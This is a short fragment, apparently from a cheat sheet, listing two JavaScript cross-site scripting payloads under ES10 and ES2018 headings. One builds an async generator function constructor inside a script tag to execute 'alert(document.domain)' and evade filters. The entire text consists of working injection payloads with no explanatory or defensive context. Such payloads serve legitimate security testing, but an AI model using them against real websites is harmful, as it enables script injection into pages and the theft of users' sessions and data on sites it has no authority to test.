ES10 BigInt ``` alert(1n) ``` ES2018 ``` <script>(asyncfunction*(){})['constructor']('alert(document.domain)')().next();</script> ```  